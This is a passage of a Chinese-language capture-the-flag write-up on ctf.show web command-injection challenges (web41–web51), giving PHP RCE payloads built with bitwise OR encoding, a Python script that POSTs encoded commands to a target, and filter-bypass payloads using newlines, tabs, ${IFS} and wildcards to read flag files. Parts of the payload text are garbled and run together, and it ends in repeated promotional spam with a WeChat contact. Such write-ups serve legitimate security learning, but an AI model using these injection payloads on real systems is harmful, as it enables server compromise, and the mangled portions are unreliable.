k %60 %0b l %60 %0c m %60 %0d n %60 %0e o %60 %0f p %60 %10 q %60 %11 r %60 %12 s %60 %13 t %60 %14 u %60 %15 v %60 %16 w %60 %17 x %60 %18 y %60 %19 z %60 %1a { %60 %1b | %60 %1c } %60 %1d ~ %60 %1e ` %60 %20
从所有字符(ASCII[0-255])中排除掉被过滤的,然后再判断或运算得到的字符是否为可见字符
可以一个一个的进行构造:比如要执行system的话就可以用以下的方式:
c=(“%13%19%13%14%05%0d”|“%60%60%60%60%60%60”)(“%03%01%14%00%06%0c%01%00”|“%60%60%60%20%60%60%60%2a”)
system(“cat fla*”)
c=“”)‘%60%60%60%60%60%60’|‘%13%19%13%14%05%0d’)((‘%03%01%14’|‘%60%60%60’).’ *');#
最前面的"");和前面的eval(合起来构成一个命令 中间是完整的一个语句:system(cat *); 最后的#表示注释,把后面所有的东西都注释起来功能消失了
使用POST传参:右键–>change request method 记得使用BP
也能用羽神的脚本更方便:
-*- coding: utf-8 -*-
import requests import urllib from sys import * import os
os.system(“F:\desktop\Learning\CTFtools\Web\phpstudy_pro\phpstudy_pro\WWW\index.php”) # 没有将php写入环境变量需手动运行 if (len(argv) != 2): print(“=” * 50) print(‘USER:python exp.py ’) print(“eg: python exp.py http://ctf.show/”) print(“=” * 50) exit(0) url = argv[1]
def action(arg): s1 = “” s2 = “” for i in arg: f = open(r"F:\desktop\Learning\CTFtools\Web\phpstudy_pro\phpstudy_pro\WWW\rce.txt", “r”) # 填txt的文件位置 while True: t = f.readline() if t == “”: break if t[0] == i:
print(i)
s1 += t[2:5] s2 += t[6:9] break f.close() output = “(”" + s1 + “”|“” + s2 + “”)" return (output)
while True: param = action(input(“\n[+] your function:”)) + action(input(“[+] your command:”)) data = { ‘c’: urllib.parse.unquote(param) } r = requests.post(url, data=data) print(“\n[*] result:\n” + r.text)
命令行的使用:
python rce.py [url]
web42(>/dev/null 2>&1)
终于没有preg_match函数来过滤了,这回里面都是认识的,只不过后面GET传参的c还连接了一个
“>/dev/null 2>&1”
对于这个语句:
/dev/null: 说明一下 /dev/null 说白了就是写入这个里面的内容都会丢失,读取这里面的内容什么也不会读取到 而前面的 > 表示重定向代表的是要去哪里 因为 > 前面没有数值,所以默认的是1,表示标准输出重定向到 /dev/null (空设备文件) 因此不会显示任何的数据,同时也不会读取到任何的数据
2>&1: 这里的1表示stdout标准输出,系统默认值是1,因此 > 前面没有值的时候就是默认标准输出 1> 这里的2表示stderr标准错误 &表示等同于的意思 在这里这个语句的意思就表示2的输出重定向等同于1,即标准错误输出重定向等同于标准输出 因为之前标准输出已经重定向到空设备文件,左移标准错误输出也重定向到空设备文件
这整一句话的意思是:让所有输出流(不管你是对的还是错的)都重定向到空设备文件中丢弃掉
所以关键就是不能让后面这个重定向执行下去就行
构造payload:
c=cat flag.php; // 用 ; 把命令隔断 c=cat flag.php|| // ||表示只执行||前面的语句 c=cat flag.php%0a // %0a是url编码,表示的是换行 c=cat flag.php%26 // %26是url编码,表示的是&符
另外说明一下: | 表示只执行后面的命令 || 表示只执行前面的命令 &和&& 表示两条命令都会执行
此外,php版本小于5的时候因为php的底层是C,所以截断有另外的%00可以使用
—web43~web52过滤+>/dev/null 2>&1—
web43(过滤分号、cat)
这个题其实就是在上一题的基础上多加了个过滤
过滤了
;、cat
说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个
构造payload:
c=nl flag.php%0a c=more flag.php%0a c=sort flag.php%0a c=less flag.php%0a c=tac flag.php%0a c=tail flag.php%0a c=strings flag.php%0a
||也能用
web44(过滤flag)
过滤了:
;、cat、flag
区区不能使用flag而已,也有构造的形式
构造payload:
c=nl fla*%0a c=more fla*%0a c=sort fla*%0a c=less fla*%0a c=tac fla*%0a c=tail fla*%0a c=strings fla*%0a
||也能用
web45(过滤空格)
过滤了:
;、cat、flag、[空格]
空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样
空格绕过:
%09 ${IFS} ${IFS}$9 <
构造payload:
?c=nl%09fl*%0a ?c=nl I F S ‘ n l {IFS}`nl IFS‘nl{IFS}fl*`%0a // 反引号表示无回显的命令执行,常配合echo来打印输出 web46(过滤$、*、数字) 过滤了: ;、cat、flag、[空格]、[0-9]、$、* 构造payload: ?c=nl%09???.???%0a ?c=nl%09fla\g.php%0a ?c=nl%09fla’'g.php%0a web47(过滤more、less、head、sort、tail) 过滤了: ;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail 构造payload: ?c=nl%09???.???%0a ?c=nl%09fla\g.php%0a ?c=nl%09fla’'g.php%0a ?c=nl web48(过滤sed、cut、awk、strings、od、curl、[反引号]) 过滤了: ;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号] 构造payload: 还是一样 ?c=nl%09???.???%0a ?c=nl%09fla\g.php%0a ?c=nl%09fla’'g.php%0a ?c=nl web49(过滤%) 过滤了: ;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、% 构造payload: %被过滤掉了,能用的就少很多了,但还是有 ?c=nl web50(过滤\x09、\x26) 过滤了: ;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%、\x09、\x26 \x09与\x26的含义其实就是%09(tab键)和%26(&) 构造payload: ?c=nl web51(过滤tac) 过滤了: ;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26 多过滤了一个tac(我寻思着我也不怎么用啊) 自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。 深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前! 因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。 既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化! 由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新 如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取) 给大家的福利 零基础入门 对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。 同时每个成长路线对应的板块都有配套的视频提供: 因篇幅有限,仅展示部分资料 一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长! B-1712651291016)] 给大家的福利 零基础入门 对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。 同时每个成长路线对应的板块都有配套的视频提供: 因篇幅有限,仅展示部分资料 一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长! [外链图片转存中…(img-II8ksPWG-1712651291017)] 相关文章
发表评论